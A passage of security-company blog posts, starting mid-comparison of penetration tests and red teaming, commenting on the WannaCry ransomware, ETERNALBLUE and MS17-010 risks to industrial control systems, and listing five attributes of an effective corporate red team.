Low to Medium. Usually requested by organizations that already know they have issues, and need help getting started.
High. The organization believes their defenses to be strong, and wants to test that assertion.
Goal
Attain a prioritized list of vulnerabilities in the environment so that remediation can occur.
Determine whether a mature security posture can withstand an intrusion attempt from an advanced attacker with a specific goal.
Focus
Breadth over depth.
Depth overbreadth.

So what now?

Most security programs benefit from utilizing some combination of security techniques. These can include any number of tasks, including penetration tests, vulnerability assessments, bug bounties, white/grey/black testing, code review, and/or red/blue/purple team exercises.

We’ll peel back the different tools and how you might use them in a future post. Until then, take a look at your needs and make sure the steps you take in the wake of WannaCry and other security incidents are more than just reacting to the crisis of the week.

INSIGHTS | May 16, 2017

#WannaCry: Examining Weaponized Malware

Attribution: You Keep Using That Word, I Do Not Think It Means What You Think It Means…

In internal discussions in virtual halls of IOActive this morning, there were many talks about the collective industry’s rush to blame or attribution over the recent WanaCry/WannaCrypt ransomware breakouts. Twitter was lit up on #Wannacry and #WannaCrypt and even Microsoft got into the action, stating, We need governments to consider the damage to civilians that comes from hoarding these vulnerabilities and the use of these exploits.”

Opinions for blame and attribution spanned the entire spectrum of response, from the relatively sane…

…to the sublimely sarcastic.

As a community, we can talk and debate who did what, and why, but in the end it really doesn’t matter. Literally, none (well, almost none) of us outside the government or intelligence communities have any impact on the discussion of attribution. Even for the government, attribution is hard to nearly impossible to do reliably, and worse – is now politicized and drawn out in the court of public opinion. The digital ink on malware or Internet attacks is hardly even dry, yet experts are already calling out “Colonel Mustard, Lead Pipe, Study” before we even know what the malware is fully capable of doing. We insist on having these hyperbolic discussions where we wax poetic about the virtues of the NSA vs. Microsoft vs. state actors.
 

It’s more important to focus on the facts and what can be observed in the behavioral characteristics of the malware and what organizations need to do to prevent infection now and in the future. 

How people classify them varies, but there are essentially three different classes of weaponized malware:

  • Semi-automatic/automatic kits that exploit “all the things.”These are the Confickers, Code-red, SQL Slamming Melissa’s of the world
  • Manual/point targeted kits that exploit “one thing at a time.” These are the types of kit that Shadow Brokers dropped. Think of these as black market, crew-served weapons, such as MANPADS
  • Automatic point target exploit kits that exploit based on specific target telemetry AND are remotely controllable in flight. This includes Stuxnet. Think of these as the modern cyber equivalent of cruise missiles

Nation state toolkits are typically elegant. As we know, ETERNALBLUE was part of a greater framework/toolkit. Whoever made WannaCrypt/Cry deconstructed a well written (by all accounts thus far) complex mechanism for point target use, and made a blunt force weapon of part of it. Of those three types above, nation states moved on from the first one over a decade ago because they’re not controllable and they don’t meet the clandestine nature that today’s operators require. Nation states typically prefer type two; however, this requires bi-directional, fully routed IP connectivity to function correctly. When you cannot get to the network or asset in question, type three is your only option. In that instance, you build in the targeting telemetry for the mission and send it on its way. This requires a massive amount of upfront HUMINT and SIGINT for targeting telemetry. As you can imagine, the weaponized malware in type three is both massive in size and in sunk cost.

WannaCry/WanaCrypt is certainly NOT types two or three and it appears that corners were cut in creating the malware. The community was very quick in actively reversing the package and it doesn’t appear that any major anti-reversing or anti-tampering methods were used. Toss in the well-publicized and rudimentary “kill switch” component and this appears almost sloppy and lacks conviction. I can think of at least a dozen more elegant command and control functions it could have implemented to leave control in the hands of the malware author. Anyone with reverse engineering skills would eventually find this “kill switch” and disable it using a hex editor to modifying a JMP instruction. Compare this to Conficker, which had password brute-forcing capabilities as well as the ability to pivot after installation and infect other hosts without the use of exploits, but rather through simple login after passwords were identified.

This doesn’t mean that WannaCry/WanaCrypt is not dangerous, on the contrary depending upon the data impacted, its consequences could be devastating. For example, impacting the safety builder controlling Safety Instrumented Systems, locking operators out of the Human Machine Interfaces (HMI’s, or computers used in industrial control environments) could lead to dangerous process failures. Likewise, loss of regulatory data that exists in environmental control systems, quality systems, historians, or other critical ICS assets could open a facility up to regulatory action. Critical infrastructure asset owners typically have horrific patch cycles with equally appalling backup and disaster recovery strategies. And if businesses are hit with this attack and lose critical data, it may open up a door to legal action for failure to follow due care and diligence to protect these systems. It’s clear this ransomware is going to be a major pain for quite some time. Due care and preventative strategies should be taken by asset owners everywhere to keep their operations up and running in the safest and secure manner possible.

It really doesn’t do much good to philosophically discuss attribution, or play as a recent hashtag calls it, the #smbBlameGame. It’s relatively clear that this is amateur hour in the cybercrime space. With a lot of people panicking about this being the “next cyber cruise missile” or equivalent, I submit that this is more akin to digital malaria.

INSIGHTS | May 13, 2017

We’re gonna need a bigger boat….

A few weeks ago back in mid-March (2017), Microsoft issued a security bulletin (MS17-010) and patch for a vulnerability that was yet to be publicly disclosed or referenced. According to the bulletin, “the most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server. This security update is rated Critical for all supported releases of Microsoft Windows.

Normally, when Microsoft issues a patch or security there is an acknowledgment on their website regarding the disclosure. Below is the website and it is an interesting process, at this point, to make a visit. https://technet.microsoft.com/en-us/library/security/mt745121.aspx

Notice anything?  MS17-010 is conspicuous in its absence.


It is often said that timing is everything, and in this case, Microsoft beat the clock. Exactly one month later, on 14 April 2017, ShadowBrokers dropped a fifth in a series of leaks supposedly associated with the NSA which included an exploit codenamed ETERNALBLUE. Flashing forward to today almost one full month later this payload has been weaponized and, over the last few hours, has been used in a rash of ransomware attacks throughout the UK, mainland Europe, and western Asia.
UK Hospitals Hit in Widespread Ransomware Attack
NSA Exploit Used by Wannacry Ransomware in Global Explosion
Spain Ransomware Outbreak

 

Considering the timing, one could be inclined to consider that this was not just Microsoft’s good fortune.

 

While pretty much the entire wired world is rushing to patch MS17-010, even though that patch has been out for almost two months, there is one technology area that is cause for particular concern especially when it comes to ransomware. This area of concern is the global industrial environments.

Historically, general purpose, run of the mill malware that leverages SMB and NetBIOS interfaces in the industrial environment are particularly troublesome, with many systems remaining infected many years later. Besides ICS environments being in an operational state that complicates the life of those seeking to patch them, some of these legacy systems often use a protocol called Object linking and embedding for Process Control (OLE for Process Control, or OPC for short). OPC Classic (a legacy protocol implementation), relies on the Distributed Component Object Model (DCOM) which makes heavy use of the Distributed Computing Environment / Remote Procedure Calls (DCE/RPC) protocol. 

In addition to NetBIOS and depending on both configuration and implementation, SMB is one of the interfaces that can be leveraged by these other services. Because both NetBIOS and SMB are needed in some manner by ICS software and protocols, many ICS systems have been negatively impacted by malware leveraging SMB and NetBIOS attacks reaching back well over a decade.


Consider the major, well-known examples of malware impacting the ICS space. In November of 2008, the first variant of Conficker was publicly identified and due to the ICS requirements of keeping the NetBIOS and SMB ports open, Conficker is still found to this day. Conficker exploited MS08-067 and due to its password brute forcing capability, is incredibly resilient to remediation attempt at the system level. Another major example that utilized the attack vector in MS08-067 was Stuxnet. We all know how that turned out.  MS17-010 has the potential to be every bit as damaging and in some ways much worse.

With the WannaCry/WanaCrypt ransomware in the wild, crossing into industrial control systems would be particularly devastating. Systems requiring real-time interfacing and control influence over physical assets could face safety/critical shutdown, or worse. When thinking about critical services to modern society (power, water, wastewater, etc.), there is a real potential, potentially for the first time ever, where critical services could be suspended due to ransomware. It may be time to rethink critical infrastructure cybersecurity engineering because if MS17-010 exploiting malware variants are successful, we are clearly doing something wrong.
INSIGHTS | September 1, 2016

Five Attributes of an Effective Corporate Red Team

After talking recently with colleagues at IOActive as well as some heads of industry-leading red teams, we wanted to share a list of attributes that we believe are key to any effective Red Team.

[ NOTE: For debate about the relevant terminology, we suggest Daniel’s post titled The Difference Between Red, Blue, and Purple Teams. ]

To be clear, we think there can be significant variance in how Red Teams are built and managed, and we believe there are likely multiple routes to success. But we believe there are a few key attributes that all (or at least most) corporate Red Teams should have as part of their program. These are:

  1. Organizational Independence
  2. Defensive Coordination
  3. Continuous Operation
  4. Adversary Emulation
  5. Efficacy Measurement

Let’s look at each of these.

Organizational Independence is the requirement that the Red Team be able to effectively act as a real-world attacker in terms of scope, tools, and techniques employed. Many organizations restrict their Red Teams to such a degree that they’re basically impotent, which in turn lulls the company into a false sense of security.

Defensive Coordination is the requirement that Red Teams regularly interact with their counterparts on the defensive side to ensure the organization is learning from their activities. If a Red Team is effective on its own, but doesn’t share its knowledge and successes with the defense in order make it stronger, then the Red Team has lost sight of its purpose.

Continuous Operation is the requirement that the organization remain under constant, rolling attack by the Red Team, which is the polar opposite of short, penetration-test style engagements. Red Teams should operate through campaigns that span weeks or months in duration, and both the defensive teams and the general user population should know that at any moment, of any day, they could be targeted by both a Red Team campaign of some sort, or by a real attacker.

Adversary Emulation is the requirement that Red Team campaigns should be regularly updated based on the actual tools, techniques, and processes employed by real-world attackers. If cyber-criminals are doing X this quarter, let’s emulate that. If we’re seeing some state actors doing Y this year, let’s emulate that. If you’re not simulating—to some significant degree—the techniques being used by actual attackers, the Red Team is providing questionable value.

Efficacy Measurement is the requirement that Red Teams know how effective they are at improving the security posture of the organization. If we can’t tell a clear story around how our defenses are improving, i.e., that it’s getting increasingly more difficult to compromise, move laterally, and achieve attacker goals, then you’re getting limited value from any work that’s being done.

Summary

Here’s a pointed capture of those points:

  • If your group is significantly restricted in its scope and capabilities by the organization, you probably don’t have an effective Red Team
  • If your group doesn’t regularly work hand-in-hand with the defensive side of the organization in order to improve the organization’s security posture, you probably don’t have an effective Red Team
  • If your internal or external service operates based on projects that happen once in a while rather than being staggered and continuous, you probably don’t have an effective Red Team
  • If you aren’t constantly updating your attack campaigns based on new intelligence on actual threat actors, you probably don’t have an effective Red Team
  • If you aren’t closely monitoring the effectiveness of the attack campaigns (and the responses to them by the defense) over time, you probably don’t have an effective Red Team

There are many other components of a solid Red Team that were not mentioned—top-end malware kits, elite security talent, deep understanding of the attacker mindset, etc.—but we think these five components are both most fundamental and most lacking.

As always, we would love to hear from other security types who might have a differing opinion. All of our positions are subject to change through exposure to compelling arguments and/or data.